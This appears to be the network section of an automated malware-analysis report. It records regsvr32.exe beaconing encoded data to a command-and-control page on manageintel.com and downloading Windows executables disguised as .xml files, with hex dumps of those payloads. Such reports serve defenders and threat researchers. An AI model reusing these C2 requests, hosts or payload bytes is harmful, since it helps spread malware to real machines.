63 44 52 58 56 58 4e 57 65 44 42 48 5a 6e 6c 71 53 45 4a 6e 4e 44 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 49 73 49 6e 70 72 51 7a 63 69 4f 69 49 69 66 51 3d 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiUnF4ZzRnPT0iLCI1ZGViOWMiOiJLdWt3cWZuYiIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJWNXBXMjV1dDVRZExTeHhqZmt2QiIsIlRBTWZtIjpbIldJdHorNStrNVZrK0t3PT0iXSwiY0JGIjoiVnB3bzF2dlA5MmhSUWh3YWV6amRkSHM9IiwiZTAzZWQiOiJVT1ZaeDZhTTBVVUxDWFprTUErbmZtZ095S2c0ZWE5WFROQk5TZUxUQ2ZZPSIsImYxZGEiOiJUNE5CMVp5cDRXVXNWeDBHZnlqSEJnND0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSIsInprQzciOiIifQ==
Jan 30, 2022 13:33:57.634951115 CET	14263	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:00 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49844	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:33:57.704222918 CET	14264	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:57.951225996 CET	14264	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:00 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49845	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:33:58.124320984 CET	14265	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:58.373992920 CET	14266	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:00 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49846	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:33:58.580157042 CET	14267	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:58.817459106 CET	14267	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:01 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49847	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:33:59.288182974 CET	14268	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:33:59.512347937 CET	14268	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:02 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49759	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:30:34 UTC	0	OUT	GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
2022-01-30 12:30:34 UTC	0	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:30:37 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 22:25:50 GMT ETag: "240c8-5d4dd3c71c40d" Accept-Ranges: bytes Content-Length: 147656 Connection: close Content-Type: application/xml
2022-01-30 12:30:34 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ac 19 b5 31 e8 78 db 62 e8 78 db 62 e8 78 db 62 fc 13 d8 63 e2 78 db 62 fc 13 de 63 60 78 db 62 fc 13 df 63 fa 78 db 62 ba 0d de 63 cd 78 db 62 ba 0d df 63 e7 78 db 62 ba 0d d8 63 fa 78 db 62 fc 13 da 63 f9 78 db 62 e8 78 da 62 90 78 db 62 b0 0d de 63 ec 78 db 62 b0 0d db 63 e9 78 db 62 b0 0d d9 63 e9 78 db 62 52 69 63 68 e8 78 db 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1xbxbxbcxbc`xbcxbcxbcxbcxbcxbxbxbcxbcxbcxbRichxb
2022-01-30 12:30:34 UTC	8	IN	Data Raw: 00 00 8b f8 6a 00 6a 01 8b 55 f8 52 8b 45 f4 50 e8 76 66 00 00 8b 4d fc 8a 14 3e 88 14 01 eb a7 8b 45 fc 5f 5e 8b e5 5d c2 04 00 55 8b ec 83 ec 0c 56 57 89 4d fc 8b 45 fc c6 40 15 01 0f 57 c0 66 0f 13 45 f4 eb 12 8b 4d f4 83 c1 01 8b 55 f8 83 d2 00 89 4d f4 89 55 f8 83 7d f8 00 77 41 72 06 83 7d f4 15 73 39 8b 4d 08 e8 5c 4d 00 00 8b f0 6a 00 6a 01 8b 45 f8 50 8b 4d f4 51 e8 09 66 00 00 8b f8 6a 00 6a 01 8b 55 f8 52 8b 45 f4 50 e8 f6 65 00 00 8b 4d fc 8a 14 3e 88 14 01 eb a7 8b 45 fc 5f 5e 8b e5 5d c2 04 00 55 8b ec 83 ec 0c 56 57 89 4d fc 8b 45 fc c6 40 1f 01 0f 57 c0 66 0f 13 45 f4 eb 12 8b 4d f4 83 c1 01 8b 55 f8 83 d2 00 89 4d f4 89 55 f8 83 7d f8 00 77 41 72 06 83 7d f4 1f 73 39 8b 4d 08 e8 dc 4c 00 00 8b f0 6a 00 6a 01 8b 45 f8 50 8b 4d f4 51 e8 89 Data Ascii: jjUREPvfM>E_^]UVWME@WfEMUMU}wAr}s9M\MjjEPMQfjjUREPeM>E_^]UVWME@WfEMUMU}wAr}s9MLjjEPMQ
2022-01-30 12:30:34 UTC	24	IN	Data Raw: 4d fc 8b e5 5d c2 04 00 cc cc cc 55 8b ec 8b 45 08 50 e8 05 23 00 00 83 c4 04 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 10 50 8b 4d 0c 51 8b 55 08 52 ff 15 44 50 01 10 5d c3 cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 89 4d fc 8b 4d fc e8 5f 19 00 00 89 45 f8 8b 45 fc 8b 48 14 89 4d f4 8b 55 f8 52 8b 45 f4 50 8b 4d 08 51 e8 12 00 00 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 08 83 c8 0f 89 45 fc 8b 4d fc 3b 4d 10 76 05 8b 45 10 eb 2e 8b 55 0c d1 ea 8b 45 10 2b c2 39 45 0c 76 05 8b 45 10 eb 1a 8b 4d 0c d1 e9 03 4d 0c 89 4d f8 8d 55 f8 52 8d 45 fc 50 e8 78 bb ff ff 8b 00 8b e5 5d c2 0c 00 55 8b ec 83 ec 10 89 4d f8 8b 4d f8 e8 7f 0a 00 00 89 45 fc 8b 4d f8 e8 24 19 00 00 89 45 f4 8b 45 fc d1 e8 Data Ascii: M]UEP#]UEPMQURDP]UMM_EEHMUREPMQ]UEEM;MvE.UE+9EvEMMMUREPx]UMMEM$EE
2022-01-30 12:30:34 UTC	40	IN	Data Raw: 75 f0 83 c4 08 8b 45 08 8b 4d 0c 8b d0 e8 d9 12 00 00 8b 45 0c 39 78 0c 74 12 68 24 c0 01 10 56 8b d7 8b c8 e8 e2 12 00 00 8b 45 0c 56 ff 75 f8 89 58 0c e8 73 fe ff ff 8b 4d ec 83 c4 08 8b d6 8b 49 08 e8 83 12 00 00 cc 6a 08 68 a8 a6 01 10 e8 26 ee ff ff 8b 45 08 85 c0 74 7e 81 38 63 73 6d e0 75 76 83 78 10 03 75 70 81 78 14 20 05 93 19 74 12 81 78 14 21 05 93 19 74 09 81 78 14 22 05 93 19 75 55 8b 48 1c 85 c9 74 4e 8b 51 04 85 d2 74 29 83 65 fc 00 52 ff 70 18 e8 4a 00 00 00 c7 45 fc fe ff ff ff eb 31 ff 75 0c ff 75 ec e8 43 00 00 00 59 59 c3 8b 65 e8 eb e4 f6 01 10 74 19 8b 40 18 8b 08 85 c9 74 10 8b 01 51 8b 70 08 8b ce ff 15 b8 51 01 10 ff d6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 55 8b ec 8b 4d 08 ff 55 0c 5d c2 08 00 55 8b ec 80 7d 0c 00 74 Data Ascii: uEME9xth$VEVuXsMIjh&Et~8csmuvxupx tx!tx"uUHtNQt)eRpJE1uuCYYet@tQpQMdY_^[UMU]U}t
2022-01-30 12:30:34 UTC	56	IN	Data Raw: 0c 75 11 6a 01 8b ce e8 fa 05 00 00 85 c0 0f 85 81 00 00 00 8b 46 08 88 18 eb cf 53 53 53 53 6a ff 56 53 ff 75 14 e8 95 11 00 00 83 c4 20 85 c0 75 16 ff 15 78 50 01 10 50 e8 14 e9 ff ff 59 e8 44 e9 ff ff 8b 00 eb 4d 57 8b 7d 0c 3b 47 0c 76 0c 50 8b cf e8 ad 05 00 00 85 c0 75 37 53 53 ff 77 0c ff 77 08 6a ff 56 53 ff 75 14 e8 4f 11 00 00 83 c4 20 85 c0 75 16 ff 15 78 50 01 10 50 e8 ce e8 ff ff 59 e8 fe e8 ff ff 8b 00 eb 06 48 89 47 10 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 51 ff 75 10 8d 45 ff 50 ff 75 0c ff 75 08 e8 67 fe ff ff 83 c4 10 c9 c3 8b ff 55 8b ec 8b 45 0c 83 ec 28 56 85 c0 75 14 e8 bd e8 ff ff 6a 16 5e 89 30 e8 95 d6 ff ff e9 bb 01 00 00 8b 75 08 53 33 db 57 89 18 8b fb 8b 06 8b cb 89 7d d8 89 4d dc 89 5d e0 85 c0 74 61 8d 4d fc 66 c7 45 fc 2a 3f Data Ascii: ujFSSSSjVSu uxPPYDMW};GvPu7SSwwjVSuO uxPPYHG3_^[]UQuEPuugUE(Vuj^0uS3W}M]taMfE*?
2022-01-30 12:30:34 UTC	72	IN	Data Raw: 00 7f 0b 66 0f d6 4c 24 04 dd 44 24 04 c3 66 0f 2e ff 7b 24 ba ec 03 00 00 83 ec 10 89 54 24 0c 8b d4 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 29 0a 00 00 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 a0 92 01 10 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 e0 92 01 10 c3 66 0f c2 1d c0 92 01 10 06 66 0f 54 1d a0 92 01 10 66 0f d6 5c 24 04 dd 44 24 04 c3 8b ff 55 8b ec 8b 4d 08 33 c0 38 01 74 0c 3b 45 0c 74 07 40 80 3c 08 00 75 f4 5d c3 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 e8 92 01 10 ff 15 54 50 01 10 a3 60 c8 01 10 c3 8b 0d 60 c8 01 10 83 f9 fe 75 0b e8 d1 ff ff ff 8b 0d 60 c8 01 10 33 c0 83 f9 ff 0f 95 c0 c3 a1 60 c8 01 10 83 f8 ff 74 0c 83 f8 fe Data Ascii: fL$D$f.{$T$T$T$$)D$~D$ff(f=\|%=2fTXfL$D$ffTf\$D$UM38t;Et@<u]3PPjPjh@hTP``u`3`t
2022-01-30 12:30:34 UTC	88	IN	Data Raw: cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~
2022-01-30 12:30:34 UTC	104	IN	Data Raw: 61 6c 69 7a 65 00 00 70 01 4f 6c 65 49 6e 69 74 69 61 6c 69 7a 65 00 6f 6c 65 33 32 2e 64 6c 6c 00 07 01 53 48 53 74 72 44 75 70 41 00 08 01 53 48 53 74 72 44 75 70 57 00 c5 00 53 48 47 65 74 54 68 72 65 61 64 52 65 66 00 00 53 48 4c 57 41 50 49 2e 64 6c 6c 00 18 02 55 75 69 64 43 72 65 61 74 65 00 00 0b 00 44 63 65 45 72 72 6f 72 49 6e 71 54 65 78 74 41 00 00 9c 01 52 70 63 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 52 50 43 52 54 34 2e 64 6c 6c 00 00 89 03 49 73 50 72 6f 63 65 73 73 6f 72 46 65 61 74 75 72 65 50 72 65 73 65 6e 74 00 82 03 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6e 74 00 b1 05 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 71 05 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 Data Ascii: alizepOleInitializeole32.dllSHStrDupASHStrDupWSHGetThreadRefSHLWAPI.dllUuidCreateDceErrorInqTextARpcExceptionFilterRPCRT4.dllIsProcessorFeaturePresentIsDebuggerPresentUnhandledExceptionFilterqSetUnhandledExceptionF
2022-01-30 12:30:34 UTC	120	IN	Data Raw: 00 64 00 65 00 4e 00 61 00 6d 00 65 00 00 00 20 00 00 00 52 00 75 00 6e 00 74 00 69 00 6d 00 65 00 5f 00 6d 00 73 00 65 00 63 00 73 00 00 00 54 45 4d 50 40 02 00 00 04 00 00 00 04 00 00 00 90 1c 00 00 01 00 00 00 9c 00 ae 6f d3 e6 ed 51 8d d4 a6 47 39 64 67 b9 0f 01 01 00 01 ff ff 42 01 00 00 44 82 09 00 45 00 76 00 65 00 6e 00 74 00 44 00 61 00 74 00 61 00 00 00 02 41 ff ff 41 00 00 00 8a 6f 04 00 44 00 61 00 74 00 61 00 00 00 29 00 00 00 06 4b 95 04 00 4e 00 61 00 6d 00 65 00 00 00 05 01 0b 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 43 00 6f 00 64 00 65 00 02 0d 00 00 08 04 41 ff ff 49 00 00 00 8a 6f 04 00 44 00 61 00 74 00 61 00 00 00 31 00 00 00 06 4b 95 04 00 4e 00 61 00 6d 00 65 00 00 00 05 01 0f 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 43 00 Data Ascii: deName Runtime_msecsTEMP@oQG9dgBDEventDataAAoData)KNameControlCodeAIoData1KNameControlC
2022-01-30 12:30:34 UTC	136	IN	Data Raw: 86 48 86 f7 0d 01 01 0c 05 00 03 82 01 01 00 12 bf a1 ef 8b 74 9a 98 44 b8 69 46 b5 ab 24 0a 0c a4 8a 67 b8 3a 81 bf 45 8a 7d 52 07 a8 8d 1f 4e 21 85 39 a3 6b 5e 2d 20 86 bf 10 b8 ae 79 3b 53 cd b4 fb d8 44 be 06 d9 5c 63 67 d4 40 16 87 44 86 72 2a d6 32 15 f5 12 83 c2 f9 e1 5d 11 40 67 f6 42 27 72 c5 23 e2 02 38 1a 4c 20 e2 db 01 f7 cd 46 4f 26 a2 7c 66 c0 51 36 b6 89 02 54 c7 fc 58 fb 6c 00 ee fe 98 a6 2e 95 a1 0c 53 29 1f 6f d8 19 a6 4f 9e f7 ac 09 ea 5d 82 c6 8b af 80 a7 bd 81 48 52 84 31 da 32 ec 15 e4 a6 4c 3d 6c 39 73 d4 0b 85 39 20 e0 85 1a 68 e1 a7 48 38 a9 d1 36 25 77 c1 8d 19 16 c5 88 4c 66 7d 2f 63 ce 98 e8 69 df ac 3c a8 5d 9d c9 1c 5b ae d8 f3 2f 74 cf b8 7e f6 d7 83 9d 11 96 62 9a ae 45 13 da 7f dc 47 fb df c3 52 9f e6 06 55 e9 9d 8c f2 3a Data Ascii: HtDiF$g:E}RN!9k^- y;SD\cg@Dr*2]@gB'r#8L FO&\|fQ6TXl.S)oO]HR12L=l9s9 hH86%wLf}/ci<][/t~bEGRU:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49761	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:30:36 UTC	144	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
2022-01-30 12:30:36 UTC	144	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:30:39 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 22:10:13 GMT ETag: "ab044-5d4dd04921d60" Accept-Ranges: bytes Content-Length: 700484 Connection: close Content-Type: application/xml
2022-01-30 12:30:36 UTC	144	IN	Data Raw: 49 41 4c 6a 51 57 73 79 56 30 35 54 51 67 41 41 2f 2f 38 41 41 4c 49 41 41 41 41 50 41 41 41 41 4c 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 41 41 41 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 45 41 41 41 51 66 75 67 34 50 74 41 6e 4e 54 4f 42 79 44 61 55 54 41 79 59 2b 4d 53 42 77 63 6d 39 6e 63 6d 74 74 49 47 4e 75 62 6d 35 76 0d 0a 47 58 67 52 4a 45 68 41 49 69 42 33 4b 32 34 67 52 45 39 54 49 47 64 76 5a 47 55 68 44 51 30 4b 53 56 68 7a 51 57 67 79 56 30 35 6f 63 72 72 75 65 31 48 55 76 58 46 52 31 4c 31 30 55 64 53 39 0d 0a 41 6d 4b 6b 2f 52 35 6a 67 2f 4d 34 65 4e 47 38 32 31 48 55 76 57 55 36 30 4c 78 69 55 64 53 39 52 48 79 6a 2f 52 78 6a 67 2f 4e 2b 5a 74 65 38 62 46 48 55 76 53 4d 6b 30 Data Ascii: IALjQWsyV05TQgAA//8AALIAAAAPAAAALVhzQWgyV05XQgAAAAAAAAoAAAAPAAAAbVhzQWgyV05XQgAAAAEAAAQfug4PtAnNTOByDaUTAyY+MSBwcm9ncmttIGNubm5vGXgRJEhAIiB3K24gRE9TIGdvZGUhDQ0KSVhzQWgyV05ocrrue1HUvXFR1L10UdS9AmKk/R5jg/M4eNG821HUvWU60LxiUdS9RHyj/Rxjg/N+Zte8bFHUvSMk0
